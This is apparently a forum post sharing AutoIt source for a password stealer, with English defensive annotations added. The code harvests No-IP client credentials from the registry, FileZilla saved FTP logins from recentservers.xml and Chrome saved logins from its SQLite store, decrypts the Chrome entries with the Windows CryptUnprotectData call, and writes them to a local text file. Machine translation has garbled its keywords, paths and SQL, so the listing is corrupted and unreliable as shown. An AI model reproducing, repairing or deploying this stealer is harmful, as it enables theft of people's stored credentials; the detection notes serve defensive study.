
AutoIt Stealer Chrome / NOIP / FileZilla parola..

Cod (AutoIt):
# Comments-start
+ + + + + + + + + + + + Autoit stealer
+ + + + + + + + + Scriere de njq8;
# Comments-end
# Include <sqlite.au3>
# Include <sqlite.dll.au3>

; Top-level driver: builds one text blob from the three collector functions
; below (NOIP, Chrome, FileZilla) and writes it to passwords.txt in the
; script's own directory.
; NOTE(review): this listing has been through machine translation; keywords
; and several string literals are not valid AutoIt as shown, so it is
; documented as-is rather than rewritten.
; Defender note: the only output visible in this listing is a local plaintext
; file; no network transfer appears here. A script host or compiled AutoIt
; binary creating a file of harvested credentials beside itself is a useful
; on-disk forensic artifact.
$ File = @ SCRIPTDIR & "\ passwords.txt"
; Any previous output file is deleted first, so each run starts from an empty file.
dac? FileExists ( $ file ) , apoi FileDelete ( $ file )
; FileOpen mode 1 is AutoIt's append-write mode; -1 signals that the open failed.
$ File_handle = FileOpen ( $ file , 1 )
dac? $ file_handle <> - 1 atunci
; The three collectors each return a string ("" when their store is absent);
; the results are concatenated and written in a single call.
FileWrite ( $ file_handle , NOIP ( ) ?i Chrome ( ) & FileZilla ( ) )
fileflush ( $ file_handle )
FileClose ( $ file_handle )
endif

; NOIP: reads two registry values (a username and a password) from a key
; under HKEY_LOCAL_MACHINE \ Software and returns them as a labelled text
; record. Returns "" when the username value is empty.
; NOTE(review): the key path and value names are garbled by translation on
; this page; judging by the function name and the URL label they presumably
; refer to the No-IP dynamic-DNS update client - confirm against a clean sample.
; Defender note: the value is emitted with a "(base64)" label and no
; decryption call, which suggests the stored secret is only encoded, not
; encrypted - TODO confirm. Registry auditing on the client's key, alerting on
; reads by any process other than the client itself, covers this collector.
func NOIP ( )
$ Usr = RegRead ( "HKEY_LOCAL_MACHINE \ Software \ vitalwer KS \ Duc" , "username" )
; No stored username is treated as "client not installed / not configured".
dac? $ usr = "" , apoi reveni ""
$ Pwd = RegRead ( "HKEY_LOCAL_MACHINE \ Software \ vitalwer KS \ Duc" , "parola" )
; Record layout: URL line, user line, password line, blank separator line.
reveni "URL: Http :/ / nu-ip.com /" & @ CRLF & "usr:" & $ usr & @ CRLF & "handicap (base64):" & $ pwd & @ CRLF & @ CRLF
endfunc

; FileZilla: scans recentservers.xml in the user's AppData \ FileZilla folder
; line by line, pulls the text between the tags for host, port, user and
; password, and appends one labelled record per server entry to the result
; string. Returns "" when the file is missing or cannot be opened.
; NOTE(review): keywords, some variable names and the tag literals are
; garbled by machine translation on this page; the block is documented
; as-is, not repaired.
; Defender note: the password field is copied straight into the output with
; no decryption step, which suggests the file held it in a directly
; recoverable form - TODO confirm for the FileZilla version in scope.
; Mitigations: do not save passwords in the client, or protect them with
; FileZilla's master-password setting. Detection: audit reads of the
; FileZilla profile XML files by processes other than FileZilla itself.
func FileZilla ( )
locale PWDs $ , $ h , $ Fn = envget ( "AppData" ) & "\ FileZilla \ recentservers.xml"
dac? FileExists ( $ Fn ) = false apoi întoarce ""
; Mode 0 opens the file read-only; -1 means the open failed.
$ H = FileOpen ( $ Fn , 0 )
dac? $ H = - 1 , atunci întoarce ""
; Per-entry state; 21 is used as the port when an entry carries no port tag.
$ Host = ""
$ Port = 21
Usr $ = ""
Pass $ = ""
; Read until FileReadLine reports end of file (@error = -1).
în timp ce adev?rata
$ Line = FileReadLine ( $ H )
dac? @ error = - 1 , atunci exitloop
; A host tag starts a new entry: reset the other fields, then take the text
; between the first ">" and the closing "</".
dac? StringInStr ( $ line , "<gazd?>" ) , apoi
Usr $ = ""
Pass $ = ""
$ Port = 21
$ Host = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
$ Host = StringMid ( $ host , StringInStr ( $ host , ">" ) + 1 )
endif
; Same two-step substring extraction for the port, user and password tags.
dac? StringInStr ( $ line , "<port>" ) , apoi
$ Port = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
$ Port = StringMid ( $ portul , StringInStr ( $ portul , ">" ) + 1 )
endif
dac? StringInStr ( $ line , "<utilizator>" ) , apoi
$ Usr = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
$ Usr = StringMid ( $ usr , StringInStr ( $ usr , ">" ) + 1 )
endif
dac? StringInStr ( $ line , "<pass>" ) , apoi
Pass $ = StringMid ( $ line , 1 , StringInStr ( $ line , "</" ) - 1 )
$ Pass = StringMid ( $ Pass , StringInStr ( $ Pass , ">" ) + 1 )
endif
; The closing server tag ends an entry: emit the accumulated record.
dac? StringInStr ( $ line , "</ server>" ) , apoi
$ PWDs = $ PWDs ?i "URL: FTP :/ /" & $ host & ":" & $ portul & @ CRLF & "usr:" & $ usr & @ CRLF & "PWD:" & $ Pass & @ CRLF & @ CRLF
endif
îndrepta
; NOTE(review): the handle opened above is not closed anywhere in the visible code.
reveni $ PWDs
endfunc
; Chrome: opens a file under the user's localappdata \ Google \ Chrome profile
; as an SQLite database, runs one query, and for every returned row appends a
; record built from columns 0 (labelled URL), 3 (labelled usr) and 5 (passed
; through uncryptrdppassword and labelled PWD). Returns "" when the file is
; missing.
; NOTE(review): the profile path and the SQL text are garbled by machine
; translation on this page; they are documented as-is, not repaired.
; Defender note: the database is read directly from the profile directory by
; a process that is not the browser. File-access auditing or EDR rules on
; non-browser processes opening the browser's credential store cover this
; collector. The listing presumably targets an older Chrome storage scheme
; in which the column value was a bare DPAPI blob - verify against the
; browser version in scope before relying on it as a current indicator.
func Chrome ( )
locale $ q , $ R , $ PWDs , $ Fn = envget ( "localappdata" ) & "\ Google \ Chrome \ Utilizator \ \ implicite de conectare de date"
dac? FileExists ( $ Fn ) = false apoi întoarce ""
; Uses the sqlite.au3 UDF named in the include lines; -1 selects the most
; recently opened database handle.
_sqlite_startup ( )
_sqlite_open ( $ Fn )
_sqlite_query ( - 1 , "Select * de login," , $ q )
; _sqlite_fetchdata returns 0 while rows remain; $R receives the row as an array.
în timp ce _sqlite_fetchdata ( $ q , $ R ) = 0
$ PWDs = $ PWDs ?i "URL:" & $ R [ 0 ] & @ CRLF & "usr:" & $ R [ 3 ] & @ CRLF & "PWD:" & uncryptrdppassword ( $ R [ 5 ] ) & @ CRLF & @ CRLF
îndrepta
_sqlite_close ( )
_sqlite_shutdown ( )
reveni $ PWDs
endfunc

; uncryptrdppassword: takes a binary blob, hands it to the Windows DPAPI
; function CryptUnprotectData in crypt32.dll, and returns the resulting bytes
; as a string. Returns "" when the DllCall itself reports an error.
; NOTE(review): keywords and one string literal are garbled by machine
; translation on this page; the block is documented as-is, not repaired.
; Defender note: DPAPI binds protected data to the logged-on user's
; credentials, so it offers no barrier against code already running as that
; user - which is the situation this function relies on. The call passes no
; optional entropy and sets the UI-forbidden flag, so no prompt is shown.
; A script interpreter or freshly dropped binary calling CryptUnprotectData
; shortly after reading a browser profile file is a strong detection signal.
func uncryptrdppassword ( $ BIN )
, Aceast? func?ie din >> http://www.autoitscript.com/forum/to...a/ # entry695769
; 0x1 is passed below as the flags argument of CryptUnprotectData.
locale const $ cryptprotect_ui_forbidden = 0x1
; Layout used for both the input and output blob: a length and a data pointer.
locale const $ data_blob = "int; ptr"

; Fixed 1024-byte staging buffer for the input blob.
locale $ passstr = dllstructcreate ( "byte [1024]" )
locale $ datain = dllstructcreate ( $ data_blob )
locale $ Dataout = dllstructcreate ( $ data_blob )
; NOTE(review): $Pwdescription is assigned here but not used in the visible code.
$ Pwdescription = 'PSW "
Pwdhash $ = ""

; Zero the output blob before the call.
dllstructsetdata ( $ Dataout , 1 , 0 )
dllstructsetdata ( $ Dataout , 2 , 0 )

; Copy the input into the staging buffer and describe it (pointer + length)
; in the input blob.
dllstructsetdata ( $ passstr , 1 , $ BIN )
dllstructsetdata ( $ datain , 2 , dllstructgetptr ( $ passstr , 1 ) )
dllstructsetdata ( $ datain , 1 , binarylen ( $ BIN ) )

; Arguments in order: input blob, four null pointers, the flags value,
; output blob.
$ Retur = DllCall ( "crypt32.dll" , "int" , "CryptUnprotectData" , _
"Ptr" , dllstructgetptr ( $ datain ) , _
"Ptr" , 0 , _
"Ptr" , 0 , _
"Ptr" , 0 , _
"Ptr" , 0 , _
"DWORD" , $ cryptprotect_ui_forbidden , _
"Ptr" , dllstructgetptr ( $ Dataout ) )
; Only the DllCall error state is checked; $Retur itself is not inspected in
; the visible code.
în cazul în care eroarea @ apoi întoarce ""

; Overlay a byte array of the reported length on the returned pointer and
; convert it to text; BinaryToString flag 4 selects UTF-8.
$ Len = dllstructgetdata ( $ Dataout , 1 )
$ Pwdhash = ptr ( dllstructgetdata ( $ Dataout , 2 ) )
$ Pwdhash = dllstructcreate ( "byte [" & $ Len si "]" , $ pwdhash )
reveni BinaryToString ( dllstructgetdata ( $ pwdhash , 1 ) , 4 )
endfunc
